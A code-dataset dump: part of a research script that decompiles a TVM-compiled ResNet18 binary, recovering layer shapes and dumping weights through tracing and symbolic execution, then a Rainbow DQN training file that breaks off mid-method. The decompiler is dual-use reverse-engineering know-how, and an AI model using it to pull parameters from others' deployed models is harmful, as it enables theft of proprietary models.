\n # ==============================================================\n # Step 2 --- Recover the Shape of each Layer\n # ==============================================================\n \n # Step 2.1 Generate and Filter Trace\n \n logger.info('START')\n func_trace_map = {}\n func_rndaddr_map = {}\n asm_files = os.listdir(utils.funcs_dir)\n for asm_file in asm_files:\n if 'labels' not in asm_file and asm_file.endswith('.txt'):\n asm_path = os.path.join(utils.funcs_dir, asm_file)\n start_addr, _ = utils.get_func_range(asm_path)\n if start_addr in utils.addr2label.keys():\n if 'dense' in utils.addr2label[start_addr] or 'conv' in utils.addr2label[start_addr]:\n trace_path = os.path.join(os.path.dirname(log_path), asm_file.replace('.txt', '.log'))\n slice_log, rnd_addr, loop_size, start_addr, end_addr = \\\n trace_filter.get_trace(asm_path, prog_path, in_data, trace_path, compiler='tvm')\n func_trace_map[asm_file] = slice_log\n func_rndaddr_map[asm_file] = (rnd_addr, loop_size, start_addr, end_addr)\n \n # print(func_trace_map)\n # print(func_rndaddr_map)\n logger.info('END')\n #exit(0)\n \n\n # ==============================================================\n\n # Step 2.2 Recover Shape with Symbolic Execution\n # Step 2.2.1 Conv and Matmul layers\n\n # func_trace_map = {'0099.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0099_slice.log',\n # '0093.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0093_slice.log',\n # '0090.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0090_slice.log',\n # '0087.txt': 
'/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0087_slice.log',\n # '0082.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0082_slice.log',\n # '0079.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0079_slice.log',\n # '0076.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0076_slice.log',\n # '0073.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0073_slice.log',\n # '0055.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0055_slice.log',\n # '0053.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0053_slice.log',\n # '0050.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0050_slice.log',\n # '0045.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0045_slice.log',\n # '0038.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0038_slice.log',\n # '0035.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0035_slice.log',\n # '0032.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0032_slice.log',\n # '0029.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0029_slice.log',\n # '0026.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0026_slice.log',\n # '0019.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0019_slice.log',\n #\n # '0047.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0047_slice.log',\n # }\n\n # func_rndaddr_map = {'0099.txt': ('0x38c930c', 64, '0x445700', '0x44849E'),\n # '0093.txt': ('0x33b8a44', 64, '0x441810', '0x443FCC'),\n # '0090.txt': ('0x32fe3dc', 64, '0x43d860', '0x440CD2'),\n # '0087.txt': ('0x32fd184', 64, '0x439780', '0x43CB33'),\n # '0082.txt': ('0x33b8b4c', 64, '0x4357e0', '0x437F34'),\n # '0079.txt': ('0x32fdac8', 64, '0x4317f0', '0x434E48'),\n # '0076.txt': ('0x33b8f80', 64, '0x42d4b0', '0x430922'),\n # '0073.txt': ('0x32fd478', 64, '0x42ac80', '0x42C631'),\n # '0055.txt': ('0x3486fb0', 64, '0x423b40', '0x42590E'),\n # '0053.txt': ('0x33b88fc', 64, '0x420690', '0x423304'),\n # '0050.txt': ('0x33b8bbc', 64, '0x41d1a0', '0x41F8B6'),\n # '0045.txt': ('0x33b8998', 64, '0x419480', '0x41BE7D'),\n # '0038.txt': ('0x38c91f8', 64, '0x414870', '0x41800E'),\n # '0035.txt': ('0x32fd4f0', 64, '0x4101e0', '0x413838'),\n # '0032.txt': ('0x32fd1fc', 64, '0x40be20', '0x40F1BD'),\n # '0029.txt': ('0x33b8a3c', 64, '0x408960', '0x40B33C'),\n # '0026.txt': ('0x33b8b40', 64, '0x405410', '0x407D41'),\n # '0019.txt': ('0x47f7d84', 64, '0x401d70', '0x403E3E'),\n #\n # '0047.txt': ('0x65c58c0', 64, '0x41c3d0', '0x41C806'),\n # }\n\n #se_engine.extern_functions = {'0x400c10': 'memset'}\n #utils.generate_symbolic_expression('0038.txt', '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0038_slice.log', exp_log_path, max_inst=5000000)\n #shape = utils.recover_shape_tvm('0038.txt', exp_log_path, mem_read_log_path, mem_write_log_path, prog_path, in_data, func_type='conv2d', optimized=True)\n #print(shape)\n #exit(0)\n # We have to pass the external function address to SE engine\n # This can be done automatically, but we do it manually for simplicity\n \n se_engine.extern_functions = {'0x400c10': 'memset'} # address in .plt, name\n func_shape = utils.handle_all_conv(prog_path, in_data, label_file, func_trace_map, compiler='tvm', optimized=True, 
topo_list=topo_list) # also all dense\n print('all conv and dense done.')\n for name, result in func_shape.items():\n print(name)\n for i in range(len(func_meta_data)):\n if func_meta_data[i][0] == name:\n func_meta_data[i][1] = result\n break\n if len(result) == 4:\n print('filter_shape', result[0])\n print('input_shape', result[1])\n print('output_shape', result[2])\n print('layout_shape', result[3])\n else:\n print(result)\n #exit(0)\n \n \n # ==============================================================\n \n # Step 2.2.2 Other layers\n # the BatchNorm2d is implemented with a special sequence (add, sqrt, divide, multiply, expand_dims, multiply, negative, multiply, add, expand_dims, add)\n \n asm_files = os.listdir(utils.funcs_dir)\n se_engine.extern_functions = {'0x400c10': 'memset'} # address in .plt, name\n results_dict = dict()\n utils.addr2label['0x444380'] = 'avg_pool2d' # manually fixed label\n for asm_file in asm_files:\n if 'labels' not in asm_file and asm_file.endswith('.txt'):\n asm_path = os.path.join(utils.funcs_dir, asm_file)\n start_addr, _ = utils.get_func_range(asm_path)\n if start_addr in utils.addr2label.keys():\n func_type = utils.addr2label[start_addr]\n\n if 'pool' in func_type: # `add` is merged in `conv2d`\n # transpose, expand_dims and relu could be ignored, batchnormalization always follow after a conv layer\n print('SE for {}, {}'.format(asm_file, func_type))\n tmp_log_path = os.path.basename(asm_file)[:-4] + '.log'\n # generate tmp trace file, it should be fast\n utils.generate_inst_trace(asm_file, tmp_log_path, prog_path, in_data, timeout=True)\n # symbolic execution, also should be fast\n utils.generate_symbolic_expression(asm_file, tmp_log_path, exp_log_path, max_inst=5000000)\n # --- try to interpret the filter shape from symbolic expression log\n shape = utils.recover_shape_tvm(asm_file, exp_log_path,\n mem_read_log_path, mem_write_log_path,\n prog_path, in_data, func_type=func_type, optimized=True)\n print('shape:', shape)\n results_dict[asm_file] = shape\n for name, result in results_dict.items():\n for i in range(len(func_meta_data)):\n if func_meta_data[i][0] == name:\n if isinstance(result, float):\n func_meta_data[i][1] = [1, int(result)]\n else:\n func_meta_data[i][1] = result\n break\n print(name)\n print(result)\n #exit(0)\n\n list_to_json(topo_list, './topo_list.json')\n dict_to_json(func_meta_data, './meta_data.json')\n\n # ==============================================================\n # Step 3 --- Extract Weights/Biases from Binary (dynamically)\n # ==============================================================\n\n func_meta_data = list(func_meta_data.values())\n new_meta_data = []\n logged_func = []\n for i in range(len(func_meta_data)):\n meta_data = func_meta_data[i]\n if meta_data[0] in logged_func:\n continue\n else:\n logged_func.append(meta_data[0])\n\n # identify the type of conv\n func_name = meta_data[0]\n conv_type = 0\n for node in topo_list:\n if 'conv2d' in node[2] and node[1] == func_name:\n conv_type = len(node[3])\n break\n\n # manually fix wrong labels\n if 'conv2d' in meta_data[3] and conv_type >= 3:\n meta_data[3] = 'conv2d, add, relu'\n\n if meta_data[3] == 'conv2d, add, relu':\n meta_data[6] = 1 if conv_type == 3 else 2\n meta_data[5] = int(meta_data[1][1][3] / meta_data[1][2][3])\n meta_data[4] = math.ceil((meta_data[1][1][3] - meta_data[1][2][3] * meta_data[5]) / 2)\n meta_data[3] = 'conv2d'\n new_meta_data.append(meta_data) # weights of conv\n meta_data = copy.deepcopy(meta_data)\n meta_data[6] = 2 if conv_type == 3 
else 3\n meta_data[5] = meta_data[4] = None\n meta_data[3] = 'add'\n meta_data[1] = [1, int(meta_data[1][0][0])]\n new_meta_data.append(meta_data) # biases of conv\n elif 'dense' in meta_data[3]:\n meta_data[6] = 1\n new_meta_data.append(meta_data) # weights of dense\n meta_data = copy.deepcopy(meta_data)\n meta_data[6] = 2\n meta_data[3] = 'add'\n meta_data[1] = [1, int(meta_data[1][0])]\n new_meta_data.append(meta_data) # biases of dense\n\n # print for debug\n func_meta_data = new_meta_data\n for meta_data in func_meta_data:\n # manually fix wrongly predicted shapes\n if '0038.txt' in meta_data[0] and 'conv2d' in meta_data[3]:\n meta_data[1] = list(meta_data[1])\n meta_data[1][-1] = (2, 2, 3, 3, 32, 64)\n # manually fix wrongly parameter index\n if meta_data[0] in ['0055.txt', '0019.txt', '0073.txt']:\n meta_data[-1] -= 1\n if meta_data[6]:\n print(meta_data)\n dict_to_json(func_meta_data, './new_meta_data.json')\n # func_meta_data = [('0026.txt', (512, 512, 3, 3), '0x404810', 'conv2d', (16, 1, 3, 3, 512, 32), 1),\n # ('0029.txt', (512, 512, 3, 3), '0x407D60', 'conv2d', (16, 1, 3, 3, 512, 32), 1),\n # ('0032.txt', (256, 128, 3, 3), '0x40B360', 'conv2d', (8, 16, 3, 3, 8, 32), 1),\n # ('0035.txt', (128, 128, 3, 3), '0x40F1E0', 'conv2d', (4, 1, 3, 3, 128, 32), 2), # 'extra_add'\n # # wrong layout shape --> ('0038.txt', (128, 64, 3, 3), '0x413860', 'conv2d', (2, 8, 3, 3, 8, 64), 1),\n # # manually correct\n # ('0038.txt', (128, 64, 3, 3), '0x413860', 'conv2d', (2, 2, 3, 3, 32, 64), 1),\n # ('0045.txt', (512, 256, 3, 3), '0x418A00', 'conv2d', (16, 32, 3, 3, 8, 32), 1),\n # ('0050.txt', (256, 256, 3, 3), '0x41C830', 'conv2d', (16, 2, 3, 3, 128, 16), 1),\n # ('0053.txt', (512, 512, 3, 3), '0x41F8E0', 'conv2d', (16, 1, 3, 3, 512, 32), 2), # 'extra_add'\n # ('0055.txt', (256, 128, 1, 1), '0x423330', 'conv2d', (16, 2, 1, 1, 64, 16), 1), # 'extra_add'\n # ('0073.txt', (128, 64, 1, 1), '0x42A470', 'conv2d', (4, 8, 1, 1, 8, 32), 1), # 'extra_add'\n # ('0076.txt', (128, 128, 3, 3), '0x42C660', 'conv2d', (4, 1, 3, 3, 128, 32), 1),\n # ('0079.txt', (64, 64, 3, 3), '0x430940', 'conv2d', (2, 1, 3, 3, 64, 32), 2), # 'extra_add'\n # ('0082.txt', (256, 256, 3, 3), '0x434E70', 'conv2d', (16, 2, 3, 3, 128, 16), 1),\n # ('0087.txt', (128, 128, 3, 3), '0x438930', 'conv2d', (4, 1, 3, 3, 128, 32), 1),\n # ('0090.txt', (64, 64, 3, 3), '0x43CB60', 'conv2d', (2, 1, 3, 3, 64, 32), 1),\n # ('0093.txt', (256, 256, 3, 3), '0x440CF0', 'conv2d', (16, 2, 3, 3, 128, 16), 2), # 'extra_add'\n # # fixed # wrong layout shape --> # ('0099.txt', (64, 3, 7, 7), '0x444E30', 'conv2d', (2, 8, 7, 7, 0.375, 32)),\n # ('0099.txt', (64, 3, 7, 7), '0x444E30', 'conv2d', (2, 1, 7, 7, 3, 32), 1),\n # ('0019.txt', (512, 256, 1, 1), '0x401550', 'conv2d', (16, 2, 1, 1, 128, 32), 1), # 'extra_add'\n #\n # ('0026.txt', (1, 512), '0x404810', 'add', 2),\n # ('0029.txt', (1, 512), '0x407D60', 'add', 2),\n # ('0032.txt', (1, 256), '0x40B360', 'add', 2),\n # ('0035.txt', (1, 128), '0x40F1E0', 'add', 3), # 'extra_add'\n # ('0038.txt', (1, 128), '0x413860', 'add', 2),\n # ('0045.txt', (1, 512), '0x418A00', 'add', 2),\n # ('0050.txt', (1, 256), '0x41C830', 'add', 2),\n # ('0053.txt', (1, 512), '0x41F8E0', 'add', 3), # 'extra_add'\n # ('0055.txt', (1, 256), '0x423330', 'add', 2), # 'extra_add'\n # ('0073.txt', (1, 128), '0x42A470', 'add', 2), # 'extra_add'\n # ('0076.txt', (1, 128), '0x42C660', 'add', 2),\n # ('0079.txt', (1, 64), '0x430940', 'add', 3), # 'extra_add'\n # ('0082.txt', (1, 256), '0x434E70', 'add', 2),\n # ('0087.txt', (1, 128), '0x438930', 
'add', 2),\n # ('0090.txt', (1, 64), '0x43CB60', 'add', 2),\n # ('0093.txt', (1, 256), '0x440CF0', 'add', 3), # 'extra_add'\n # ('0099.txt', (1, 64), '0x444E30', 'add', 2),\n # ('0019.txt', (1, 512), '0x401550', 'add', 2), # 'extra_add'\n #\n # ('0047.txt', (1000, 512), '0x41BEA0', 'dense', 1),\n # ('0047.txt', (1, 1000), '0x41BEA0', 'add', 2),\n # ]\n\n for fun_data in func_meta_data:\n func_name = fun_data[0]\n w_shape = fun_data[1]\n dump_point = fun_data[2]\n func_type = fun_data[3]\n data_index = fun_data[-1]\n layout_shape = ()\n if func_type == 'conv2d':\n layout_shape = fun_data[1][-1]\n w_shape = w_shape[0]\n layout_shape = [int(layout_shape[i]) for i in range(len(layout_shape))]\n w_shape = [int(w_shape[i]) for i in range(len(w_shape))]\n\n utils.extract_params_tvm(prog_path, in_data, w_shape, dump_point, mem_dump_log_path, func_name,\n func_type=func_type, data_idx=data_index, special_layout=layout_shape)\n","sub_path":"evaluation/resnet18_tvm_v07_O3/resnet18_tvm_O3_decompile.py","file_name":"resnet18_tvm_O3_decompile.py","file_ext":"py","file_size_in_byte":18145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"464108771","text":"import argparse\nimport os\nimport collections\nfrom torch.utils.tensorboard.writer import SummaryWriter\n\nimport tqdm\nfrom schedulers import multi_schedulers\nfrom queryast import HoleQuery\nimport random\n\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\nfrom rl_agent import OdinsynthRLAgentWrapper\nimport numpy as np\nfrom rl_environment import OdinsynthEnv, OdinsynthEnvFactory, OdinsynthEnvStep, OdinsynthEnvWrapper\nfrom rl_utils import SumSegmentTree, MinSegmentTree\nfrom collections import deque\nfrom typing import Deque, Dict, List, Tuple\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef linear_schedule(start_e: float, end_e: float, duration: int, t: int):\n slope = (end_e - start_e) / duration\n return max(slope * t + start_e, end_e)\n\n\nclass ReplayBuffer:\n \"\"\"A simple numpy replay buffer.\"\"\"\n\n def __init__(\n self, \n size: int, \n batch_size: int = 32, \n n_step: int = 1, \n gamma: float = 0.99\n ):\n self.obs_buf: List[OdinsynthEnvStep] = [None] * size\n self.next_obs_buf: List[OdinsynthEnvStep] = [None] * size\n self.acts_buf: List[int] = [None] * size\n self.rews_buf: List[float] = [None] * size\n self.done_buf: List[bool] = [None] * size\n self.max_size, self.batch_size = size, batch_size\n self.ptr, self.size, = 0, 0\n \n # for N-step Learning\n self.n_step_buffer = deque(maxlen=n_step)\n self.n_step = n_step\n self.gamma = gamma\n\n def store(\n self, \n obs: OdinsynthEnvStep, \n act : int, \n rew: float, \n next_obs: OdinsynthEnvStep, \n done: bool,\n ) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n transition = (obs, act, rew, next_obs, done)\n self.n_step_buffer.append(transition)\n\n # single step transition is not ready\n if len(self.n_step_buffer) < self.n_step:\n return ()\n \n # make a n-step transition\n rew, next_obs, done = self._get_n_step_info(\n self.n_step_buffer, self.gamma\n )\n obs, act = self.n_step_buffer[0][:2]\n \n self.obs_buf[self.ptr] = obs\n self.next_obs_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n \n return self.n_step_buffer[0]\n\n def sample_batch(self) -> Dict[str, np.ndarray]:\n idxs = np.random.choice(self.size, 
size=self.batch_size, replace=False)\n s_lst, a_lst, r_lst, s_prime_lst, done_mask_lst = [], [], [], [], []\n \n for idx in idxs:\n s_lst.append(self.obs_buf[idx])\n a_lst.append(self.acts_buf[idx])\n r_lst.append(self.rews_buf[idx])\n s_prime_lst.append(self.next_obs_buf[idx])\n done_mask_lst.append(self.done_buf[idx])\n\n return ExperienceReplayBatch(\n np.array(s_lst), \n np.array(a_lst),\n np.array(r_lst), \n np.array(s_prime_lst),\n np.array(done_mask_lst),\n )\n \n def sample_batch_from_idxs(\n self, idxs: np.ndarray\n ):\n # for N-step Learning\n s_lst, a_lst, r_lst, s_prime_lst, done_mask_lst = [], [], [], [], []\n \n for idx in idxs:\n s_lst.append(self.obs_buf[idx])\n a_lst.append(self.acts_buf[idx])\n r_lst.append(self.rews_buf[idx])\n s_prime_lst.append(self.next_obs_buf[idx])\n done_mask_lst.append(self.done_buf[idx])\n\n return ExperienceReplayBatch(\n np.array(s_lst), \n np.array(a_lst),\n np.array(r_lst), \n np.array(s_prime_lst),\n np.array(done_mask_lst),\n )\n \n def _get_n_step_info(\n self, n_step_buffer: Deque, gamma: float\n ) -> Tuple[np.int64, np.ndarray, bool]:\n \"\"\"Return n step rew, next_obs, and done.\"\"\"\n # info of the last transition\n rew, next_obs, done = n_step_buffer[-1][-3:]\n\n for transition in reversed(list(n_step_buffer)[:-1]):\n r, n_o, d = transition[-3:]\n\n rew = r + gamma * rew * (1 - d)\n next_obs, done = (n_o, d) if d else (next_obs, done)\n\n return rew, next_obs, done\n\n def __len__(self) -> int:\n return self.size\n\nclass PrioritizedReplayBuffer(ReplayBuffer):\n \"\"\"Prioritized Replay buffer.\n \n Attributes:\n max_priority (float): max priority\n tree_ptr (int): next index of tree\n alpha (float): alpha parameter for prioritized replay buffer\n sum_tree (SumSegmentTree): sum tree for the priorities\n min_tree (MinSegmentTree): min tree for the minimum priority, used to get the max weight\n \n \"\"\"\n \n def __init__(\n self, \n size: int, \n batch_size: int = 32, \n alpha: float = 0.6,\n n_step: int = 1, \n gamma: float = 0.99,\n ):\n \"\"\"Initialization.\"\"\"\n assert alpha >= 0\n \n super(PrioritizedReplayBuffer, self).__init__(\n size, batch_size, n_step, gamma\n )\n self.max_priority, self.tree_ptr = 1.0, 0\n self.alpha = alpha\n \n # capacity must be positive and a power of 2.\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n \n def store(\n self, \n obs: OdinsynthEnvStep, \n act: int, \n rew: float, \n next_obs: OdinsynthEnvStep, \n done: bool,\n ) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n transition = super().store(obs, act, rew, next_obs, done)\n \n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n \n return transition\n
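\n # NOTE (added, hedged): store gives each new transition the current max priority, so every experience is drawn at least once before its own TD error can demote it. With the default alpha=0.6, a raw priority p contributes p**alpha mass to the sum tree; an illustrative value, not from the original file:\n # >>> 2.0 ** 0.6\n # 1.5157...\n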
\n def sample_batch(self, beta: float = 0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n assert len(self) >= self.batch_size\n assert beta > 0\n \n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n \n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n assert len(indices) == len(priorities)\n\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n\n self.max_priority = max(self.max_priority, priority)\n \n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n \n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n \n return indices\n \n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n # get max weight\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n \n # calculate weights\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n \n return weight\n\n\nExperienceReplayBatch = collections.namedtuple('ExperienceReplayBatch', ['obs', 'acts', 'rews', 'next_obs', 'done']) \nPrioritizedExperienceReplayBatch = collections.namedtuple('PrioritizedExperienceReplayBatch', ['obs', 'acts', 'rews', 'next_obs', 'done', 'weights', 'indices']) \n\n\nclass RainbowDQNAgent:\n \"\"\"DQN Agent interacting with environment.\n \n Attributes:\n env (gym.Env): openAI Gym environment\n memory (PrioritizedReplayBuffer): replay memory to store transitions\n batch_size (int): batch size for sampling\n target_update (int): period for target model's hard update\n gamma (float): discount factor\n dqn (Network): model to train and select actions\n dqn_target (Network): target model to update\n optimizer (torch.optim): optimizer for training dqn\n transition (list): transition information including \n state, action, reward, next_state, done\n v_min (float): min value of support\n v_max (float): max value of support\n atom_size (int): the unit number of support\n support (torch.Tensor): support for categorical dqn\n use_n_step (bool): whether to use n_step memory\n n_step (int): step number to calculate n-step td error\n memory_n (ReplayBuffer): n-step replay buffer\n \"\"\"\n\n def __init__(\n self, \n hparams = {},\n # memory_size: int,\n # batch_size: int,\n # target_update: int,\n # gamma: float = 0.99,\n # # PER parameters\n # alpha: float = 0.2,\n # beta: float = 0.6,\n # prior_eps: float = 1e-6,\n # # N-step Learning\n # n_step: int = 3,\n ):\n \"\"\"Initialization.\n \n Args:\n env (gym.Env): openAI Gym environment\n memory_size (int): length of memory\n batch_size (int): batch size for sampling\n target_update (int): period for target model's hard update\n lr (float): learning rate\n gamma (float): discount factor\n alpha (float): determines how much prioritization is used\n beta (float): determines how much importance sampling is used\n prior_eps (float): guarantees every transition can be sampled\n v_min (float): min value of support\n v_max (float): max value of support\n atom_size (int): the unit number of support\n n_step (int): step number to calculate n-step td error\n \"\"\"\n # action_dim = env.action_space.n\n self.hparams = hparams\n \n\n self.batch_size = self.hparams['batch_size']\n self.target_update = 
self.hparams['target_network_frequency']\n self.gamma = self.hparams['gamma']\n # NoisyNet: All attributes related to epsilon are removed\n \n # device: cpu / gpu\n self.device = torch.device('cuda:0')\n print(self.device)\n \n # PER\n # memory for 1-step Learning\n self.beta = self.hparams['beta']\n self.prior_eps = self.hparams['prior_eps']\n self.memory = PrioritizedReplayBuffer(\n size = self.hparams['buffer_size'], batch_size = self.batch_size, alpha=self.hparams['alpha']\n )\n \n # memory for N-step Learning\n self.use_n_step = True if self.hparams.get('n_step', 0) > 1 else False\n if self.use_n_step:\n self.n_step = self.hparams['n_step']\n self.memory_n = ReplayBuffer(\n self.hparams['buffer_size'], self.batch_size, n_step=self.hparams['n_step'], gamma=self.hparams['gamma']\n )\n \n # networks: dqn, dqn_target\n self.dqn = OdinsynthRLAgentWrapper(device=self.device)\n self.dqn_target = OdinsynthRLAgentWrapper(device=self.device)\n self.dqn_target.load_state_dict(self.dqn.state_dict())\n self.dqn_target.eval()\n \n # optimizer\n self.optimizer = torch.optim.Adam(self.dqn.parameters())\n\n # transition to store in memory\n self.transition = list()\n\n train_env_factory, test_env_factory = OdinsynthEnvFactory.get_train_test_factories(hparams.get('datapath', '/data/nlp/corpora/odinsynth/data/rules100k/'), test_size = hparams.get('test_size', 0.005))\n\n self.train_env_factory = OdinsynthEnvFactory(train_env_factory.problem_specifications[:20000])\n self.test_env_factory = test_env_factory\n\n self.train_env = OdinsynthEnvWrapper(train_env_factory)\n self.test_env = OdinsynthEnvWrapper(test_env_factory)\n\n # self.epsilon = 0.9 # self.hparams['epsilon']\n\n \n # mode: train / test\n self.is_test = False\n\n def select_action(self, obs: OdinsynthEnvStep, epsilon) -> int:\n \"\"\"Select an action from the input state.\"\"\"\n if random.random() < epsilon:\n # with torch.no_grad():\n # values = self.dqn.forward([obs])\n # values = torch.tensor(values)\n # values = F.softmax(values, dim=-1)[0][0].detach().cpu().numpy()\n # action = np.random.choice(list(range(values.shape[0])), 1, p=values)[0]\n action = self.train_env.action_space.sample()\n else:\n logits = self.dqn.forward([obs])[0][0]\n action = np.argmax(logits, axis=-1)\n\n if not self.is_test:\n self.transition = [obs, action]\n \n return action\n\n def step(self, action: np.ndarray) -> Tuple[np.ndarray, np.float64, bool]:\n \"\"\"Take an action and return the response of the env.\"\"\"\n next_state, reward, done, _ = self.train_env.step(action)\n\n if not self.is_test:\n self.transition += [reward, next_state, done]\n \n # N-step transition\n if self.use_n_step:\n one_step_transition = self.memory_n.store(*self.transition)\n # 1-step transition\n else:\n one_step_transition = self.transition\n\n # add a single step transition\n if one_step_transition:\n self.memory.store(*one_step_transition)\n \n return next_state, reward, done\n\n def update_model(self) -> torch.Tensor:\n \"\"\"Update the model by gradient descent.\"\"\"\n # PER needs beta to calculate weights\n samples = self.memory.sample_batch(self.beta)\n weights = torch.FloatTensor(\n samples.weights\n ).to(self.device)\n indices = samples.indices\n \n # 1-step Learning loss\n elementwise_loss = self._compute_dqn_loss(samples, self.gamma)\n \n # PER: importance sampling before average\n loss = torch.mean(elementwise_loss * weights)\n \n # N-step Learning loss\n # we are gonna combine 1-step loss and n-step loss so as to\n # prevent high-variance. 
The original rainbow employs n-step loss only.\n if self.use_n_step:\n gamma = self.gamma ** self.n_step\n samples = self.memory_n.sample_batch_from_idxs(indices)\n elementwise_loss_n_loss = self._compute_dqn_loss(samples, gamma)\n elementwise_loss += elementwise_loss_n_loss\n \n # PER: importance sampling before average\n loss = torch.mean(elementwise_loss * weights)\n\n self.optimizer.zero_grad()\n loss.backward()\n clip_grad_norm_(self.dqn.parameters(), 10.0)\n self.optimizer.step()\n \n # PER: update priorities\n loss_for_prior = elementwise_loss.detach().cpu().numpy()\n new_priorities = loss_for_prior + self.prior_eps\n self.memory.update_priorities(indices, new_priorities)\n return loss.item()\n \n def train(self):\n \"\"\"Train the agent.\"\"\"\n self.is_test = False\n \n epsilon = 0.9 # We will change this value during training using a scheduling technique\n\n state = self.train_env.reset()\n update_cnt = 0\n losses = []\n scores = []\n score = 0\n\n # for frame_idx in range(1, self.hparams['total_timesteps'] + 1):\n for frame_idx in tqdm.tqdm(range(1, self.hparams['total_timesteps'] + 1)):\n action = self.select_action(state, epsilon)\n epsilon = linear_schedule(self.hparams['start_e'], self.hparams['end_e'], self.hparams['exploration_fraction'] * self.hparams['total_timesteps'], frame_idx)\n # epsilon = multi_schedulers(frame_idx, schedulers_dict, schedulers_params_dict) #linear_schedule(self.hparams['start_e'], self.hparams['end_e'], self.hparams['exploration_fraction']*self.hparams['total_timesteps'], global_step)\n next_state, reward, done = self.step(action)\n\n state = next_state\n score += reward\n\n # PER: increase beta\n fraction = min(frame_idx / self.hparams['total_timesteps'], 1.0)\n self.beta = self.beta + fraction * (1.0 - self.beta)\n\n # if episode ends\n if done:\n state = self.train_env.reset()\n scores.append(score)\n score = 0\n\n # if training is ready\n if frame_idx > self.hparams['learning_starts']:\n loss = self.update_model()\n losses.append(loss)\n update_cnt += 1\n \n # if hard update is needed\n if update_cnt % self.target_update == 0:\n self._target_hard_update()\n\n if (frame_idx + 1) % 500 == 0:\n # print(f\"global_step={global_step}, episode_reward={total_reward/accumulation_counter}\")\n torch.save(self.dqn.state_dict(), f\"{self.hparams['savepath']}_q_network_{frame_idx}.pt\")\n torch.save(self.dqn_target.state_dict(), f\"{self.hparams['savepath']}_target_network_{frame_idx}.pt\")\n solved_percentage, steps = self.test()\n print(solved_percentage, steps)\n writer.add_scalar(\"charts/test_result_solved\", solved_percentage, frame_idx)\n writer.add_scalar(\"charts/test_result_steps\", steps, frame_idx)\n self.dqn.train()\n\n\n # plotting\n # if frame_idx % plotting_interval == 0:\n # self._plot(frame_idx, scores, losses)\n \n self.train_env.close()\n # writer.close()\n print(f\"runs/{experiment_name}\")\n \n def save_model(self):\n torch.save(self.dqn.state_dict(), f\"{self.hparams['savepath']}_q_network5.pt\")\n torch.save(self.dqn_target.state_dict(), 